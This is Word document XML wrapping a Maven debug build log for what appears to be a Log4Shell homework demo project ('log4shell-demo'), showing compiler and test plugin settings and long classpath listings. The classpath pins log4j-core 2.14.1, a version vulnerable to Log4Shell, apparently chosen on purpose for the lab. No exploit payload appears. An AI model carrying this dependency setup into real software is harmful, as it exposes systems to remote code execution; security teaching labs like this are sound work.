    <w:p w14:paraId="774E350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sun.stdout.encoding=UTF-8, env.SSH_TTY=/dev/pts/0, spring-kafka.version=2.7.7, jersey.version=2.33, user.name=ec2-user, hazelcast.version=4.1.5, env.SELINUX_LEVEL_REQUESTED=, jdom2.version=2.0.6, atomikos.version=4.0.6, aspectj.version=1.9.7, hsqldb.version=2.5.2, ojdbc.version=19.3.0.0, env.XDG_RUNTIME_DIR=/run/user/1000, webjars-locator-core.version=0.46, project.reporting.outputEncoding=UTF-8, env.MOTD_SHOWN=pam, env.XDG_SESSION_TYPE=tty, oauth2-oidc-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sdk.version=9.9.1, awaitility.version=4.0.3, env.OLDPWD=/home/ec2-user/log4shell-homework, env.PWD=/home/ec2-user/log4shell-homework, embedded-mongo.version=3.0.0, env.LESSOPEN=||/usr/bin/lesspipe.sh %s, spring-ldap.version=2.3.4.RELEASE, java.class.path=/usr/share/maven/boot/plexus-classworlds-2.6.0.jar, dependency-management-plugin.version=1.0.11.RELEASE, env.HOME=/home/ec2-user, java.vm.vendor=Amazon.com Inc., maven-javadoc-plugin.version=3.2.0, servlet-api.version=4.0.1, rsocket.version=1.1.1, jakarta-persistence.version=2.2.3, artemis.version=2.17.0, groovy.version=3.0.9, javax-cache.version=1.1.1, logback.version=1.2.6, prometheus-pushgateway.version=0.10.0, sun.cpu.endian=little, versions-maven-plugin.version=2.8.1, user.language=en, jedis.version=3.6.3, maven-clean-plugin.version=3.1.0, javax-mail.version=1.6.2, maven-surefire-plugin.version=2.22.2, javax-annotation.version=1.3.2, spring-data-bom.version=2021.0.5, mysql.version=8.0.26, classmate.version=1.5.1, jaybird.version=4.0.3.java8, antlr2.version=2.7.7, selenium.version=3.141.59, glassfish-el.version=3.0.4, project.build.sourceEncoding=UTF-8, jooq.version=3.14.15, java.vendor.url.bug=https://github.com/corretto/corretto-17/issues/, user.dir=/home/ec2-user/log4shell-homework, ehcache.version=2.10.9.2, junit-jupiter.version=5.7.2, java.vm.version=17.0.15+6-LTS, neo4j-java-driver.version=4.2.7, jakarta-activation.version=1.2.2, spring-session-bom.version=2021.0.2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E54E6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6A12BC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6BE21F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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE224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directory /home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F70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excludes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDCD3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includes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B02A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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5378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no use filter components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D5B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09CDCB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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371427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org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2CBD2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'org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6252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basedir = /home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF263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buildDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD3C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compilePath = [/home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A87F2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compileSourceRoots = [/home/ec2-user/log4shell-homework/src/test/java]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082320E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compilerId = javac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B25C6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debug = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F48B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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE452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failOnError = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542C3C1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failOnWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400B601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(f) forceJavacCompilerUse = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F71D1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fork = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E87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generatedTestSourcesDirectory = /home/ec2-user/log4shell-homework/target/generated-test-sources/test-annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F7BBE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mojoExecution = org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile {execution: default-testCompile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EFA4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optimize = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CC1E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outputDirectory = /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526A9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parameters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F7F0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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242847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session = org.apache.maven.execution.MavenSession@2dddc1b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383F15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showDeprecation = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672820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showWarnings = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0968ECF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skipMultiThreadWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956C9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source = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31742F3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staleMillis = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514502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target = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C57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testPath = [/home/ec2-user/log4shell-homework/target/test-classes, /home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403FA71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useIncrementalCompilation = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9C9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verbose = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAAFA1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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0349FE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compiler 'javac'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A813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sources to compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F887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36C67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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D125B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mirror maven-default-http-blocker (http://0.0.0.0/) for snapshots (http://snapshots.maven.codehaus.org/maven2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1CD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Using mirror maven-default-http-blocker (http://0.0.0.0/) for central (http://repo1.maven.org/maven2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744557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Dependency collection stats {ConflictMarker.analyzeTime=1168133, ConflictMarker.markTime=2374090, ConflictMarker.nodeCount=114, ConflictIdSorter.graphTime=440624, ConflictIdSorter.topsortTime=33317, ConflictIdSorter.conflictIdCount=37, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=3661681, ConflictResolver.conflictItemCount=79, DefaultDependencyCollector.collectTime=72056975, DefaultDependencyCollector.transformTime=7709973}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23295EF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org.apache.maven.plugins:maven-surefire-plugin:jar:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C3FD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org.apache.maven.surefire:maven-surefire-common:jar:2.22.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A9B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org.apache.maven:maven-plugin-api:jar:2.2.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4CBA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org.apache.maven.plugin-tools:maven-plugin-annotations:jar:3.5.2:compile (scope managed from default) (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C0B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org.apache.maven.surefire:surefire-api:jar:2.22.2:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE87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org.apache.maven.surefire:surefire-logger-api:jar:2.22.2:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0280D3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org.apache.maven.surefire:surefire-booter:jar:2.22.2:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23406E1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org.apache.maven:maven-artifact:jar:2.2.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CB2B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org.codehaus.plexus:plexus-utils:jar:1.5.15:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0246A2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org.apache.maven:maven-plugin-descriptor:jar:2.2.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACDF1A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org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-9-stable-1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BBEFD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junit:junit:jar:4.12:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED75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org.hamcrest:hamcrest-core:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF2F8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org.apache.maven:maven-project:jar:2.2.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FD1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org.apache.maven:maven-settings:jar:2.2.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED165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org.apache.maven:maven-profile:jar:2.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187FF21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org.apache.maven:maven-artifact-manager:jar:2.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F77ED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backport-util-concurrent:backport-util-concurrent:jar:3.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E3B1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org.apache.maven:maven-plugin-registry:jar:2.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581398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org.codehaus.plexus:plexus-interpolation:jar:1.11:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D30AB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org.apache.maven:maven-model:jar:2.2.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754DF69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org.apache.maven:maven-core:jar:2.2.1:compile (version managed from default) (exclusions managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA44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org.apache.maven:maven-plugin-parameter-documenter:jar:2.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2933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org.slf4j:slf4j-jdk14:jar:1.5.6:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D987F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org.slf4j:slf4j-api:jar:1.5.6:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5661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org.slf4j:jcl-over-slf4j:jar:1.5.6:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F05E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org.apache.maven.reporting:maven-reporting-api:jar:3.0:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A76D76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org.apache.maven:maven-repository-metadata:jar:2.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C328FC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org.apache.maven:maven-error-diagnostics:jar:2.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC31E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org.apache.maven:maven-monitor:jar:2.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7651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classworlds:classworlds:jar:1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814C6B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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10177F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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709516B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org.apache.maven:maven-toolchain:jar:2.2.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22968C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org.codehaus.plexus:plexus-java:jar:0.9.10:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049639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org.ow2.asm:asm:jar:6.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1220CA3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com.thoughtworks.qdox:qdox:jar:2.0-M8:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA5C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Created new class realm plugin&gt;org.apache.maven.plugins:maven-surefire-plugin:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CAB0E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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-surefire-plugin:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF092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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742BE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Populating class realm plugin&gt;org.apache.maven.plugins:maven-surefire-plugin:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769084B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org.apache.maven.plugins:maven-surefire-plugin:jar:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214012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org.apache.maven.surefire:maven-surefire-common:jar:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3213D22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org.apache.maven.plugin-tools:maven-plugin-annotations:jar:3.5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D713D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org.apache.maven.surefire:surefire-api:jar:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A13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org.apache.maven.surefire:surefire-logger-api:jar:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC30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org.apache.maven.surefire:surefire-booter:jar:2.22.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4563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org.codehaus.plexus:plexus-utils:jar:1.5.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730AC8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junit:junit:jar:4.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0A1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org.hamcrest:hamcrest-core:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F379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backport-util-concurrent:backport-util-concurrent:jar:3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C752C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org.codehaus.plexus:plexus-interpolation:jar:1.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463404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org.slf4j:slf4j-jdk14:jar:1.5.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548BD1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org.slf4j:jcl-over-slf4j:jar:1.5.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E066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org.apache.maven.reporting:maven-reporting-api:jar:3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C610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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A78D0B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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB1F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Included: org.codehaus.plexus:plexus-java:jar:0.9.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421895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org.ow2.asm:asm:jar:6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D70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com.thoughtworks.qdox:qdox:jar:2.0-M8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E40CB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org.apache.maven.plugins:maven-surefire-plugin:2.22.2:test from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-surefire-plugin:2.22.2, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D12B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'org.apache.maven.plugins:maven-surefire-plugin:2.22.2:test' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118AD79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additionalClasspathElements = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D1CC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basedir = /home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C530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childDelegation = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD1E4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classesDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522890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classpathDependencyExcludes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79484D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dependenciesToScan = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D06F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disableXmlReport = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DCD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enableAssertions = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B291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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08854B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forkCount = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB4F5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forkMode = once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45327E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forkedProcessExitTimeoutInSeconds = 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C5E1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junitArtifactName = junit:junit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF21B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junitPlatformArtifactName = org.junit.platform:junit-platform-engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615EF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localRepository =       id: local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62908C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url: file:///home/ec2-user/.m2/repository/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E700B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layout: default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8849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snapshots: [enabled =&gt; true, update =&gt; always]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C02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releases: [enabled =&gt; true, update =&gt; always]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A5C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blocked: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738717B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6631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parallelMavenExecution = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90A5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(s) parallelOptimized = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1853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perCoreThreadCount = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024106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pluginArtifactMap = {org.apache.maven.plugins:maven-surefire-plugin=org.apache.maven.plugins:maven-surefire-plugin:maven-plugin:2.22.2:, org.apache.maven.surefire:maven-surefire-common=org.apache.maven.surefire:maven-surefire-common:jar:2.22.2:compile, org.apache.maven:maven-plugin-api=org.apache.maven:maven-plugin-api:jar:2.2.1:compile, org.apache.maven.plugin-tools:maven-plugin-annotations=org.apache.maven.plugin-tools:maven-plugin-annotations:jar:3.5.2:compile, org.apache.maven.surefire:surefire-api=org.apache.maven.surefire:surefire-api:jar:2.22.2:compile, org.apache.maven.surefire:surefire-logger-api=org.apache.maven.surefire:surefire-logger-api:jar:2.22.2:compile, org.apache.maven.surefire:surefire-booter=org.apache.maven.surefire:surefire-booter:jar:2.22.2:compile, org.apache.maven:maven-artifact=org.apache.maven:maven-artifact:jar:2.2.1:compile, org.codehaus.plexus:plexus-utils=org.codehaus.plexus:plexus-utils:jar:1.5.15:compile, org.apache.maven:maven-plugin-descriptor=org.apache.maven:maven-plugin-descriptor:jar:2.2.1:compile, org.codehaus.plexus:plexus-container-default=org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-9-stable-1:compile, junit:junit=junit:junit:jar:4.12:compile, org.hamcrest:hamcrest-core=org.hamcrest:hamcrest-core:jar:1.3:compile, org.apache.maven:maven-project=org.apache.maven:maven-project:jar:2.2.1:compile, org.apache.maven:maven-settings=org.apache.maven:maven-settings:jar:2.2.1:compile, org.apache.maven:maven-profile=org.apache.maven:maven-profile:jar:2.2.1:compile, 